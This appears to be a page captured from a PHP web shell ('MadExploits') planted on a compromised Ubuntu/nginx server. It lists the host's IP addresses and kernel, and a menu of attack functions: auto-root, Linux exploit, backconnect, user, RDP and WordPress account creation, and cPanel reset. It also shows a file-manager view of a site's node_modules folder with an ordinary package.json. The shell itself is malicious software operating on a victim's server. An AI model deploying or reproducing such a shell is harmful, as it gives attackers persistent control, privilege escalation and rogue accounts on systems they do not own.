Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
object.values /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
drwxr-xr-x
.editorconfig
286
B
-rw-r--r--
.eslintrc
285
B
-rw-r--r--
.travis.yml
7.92
KB
-rw-r--r--
CHANGELOG.md
1.24
KB
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
2.19
KB
-rw-r--r--
auto.js
36
B
-rw-r--r--
implementation.js
416
B
-rw-r--r--
index.js
335
B
-rw-r--r--
package.json
1.94
KB
-rw-r--r--
polyfill.js
189
B
-rw-r--r--
shim.js
314
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "object.values", "version": "1.1.0", "author": "Jordan Harband", "description": "ES2017 spec-compliant Object.values shim.", "license": "MIT", "main": "index.js", "scripts": { "pretest": "npm run --silent lint", "test": "npm run --silent tests-only", "posttest": "npm run audit", "tests-only": "es-shim-api && npm run --silent test:shimmed && npm run --silent test:module", "test:shimmed": "node test/shimmed.js", "test:module": "node test/index.js", "coverage": "covert test/*.js", "coverage-quiet": "covert test/*.js --quiet", "lint": "eslint .", "preaudit": "npm install --package-lock --package-lock-only", "audit": "npm audit", "postaudit": "rm package-lock.json" }, "repository": { "type": "git", "url": "git://github.com/es-shims/Object.values.git" }, "keywords": [ "Object.values", "Object.keys", "Object.entries", "values", "ES7", "ES8", "ES2017", "shim", "object", "keys", "entries", "polyfill", "es-shim API" ], "dependencies": { "define-properties": "^1.1.3", "es-abstract": "^1.12.0", "function-bind": "^1.1.1", "has": "^1.0.3" }, "devDependencies": { "@es-shims/api": "^2.1.2", "@ljharb/eslint-config": "^13.1.1", "array-map": "^0.0.0", "covert": "^1.1.1", "eslint": "^5.11.1", "object-keys": "^1.0.12", "tape": "^4.9.2" }, "testling": { "files": "test/index.js", "browsers": [ "iexplore/9.0..latest", "firefox/4.0..6.0", "firefox/15.0..latest", "firefox/nightly", "chrome/4.0..10.0", "chrome/20.0..latest", "chrome/canary", "opera/11.6..latest", "opera/next", "safari/5.0..latest", "ipad/6.0..latest", "iphone/6.0..latest", "android-browser/4.2" ] }, "engines": { "node": ">= 0.4" } ,"_resolved": "https://registry.npmjs.org/object.values/-/object.values-1.1.0.tgz" ,"_integrity": "sha512-8mf0nKLAoFX6VlNVdhGj31SVYpaNFtUnuoOXWyFEstsWRgU837AK+JYM0iAxwkSzGRbwn8cbFmgbyxj1j4VbXg==" ,"_from": "object.values@^1.1.0" }
Close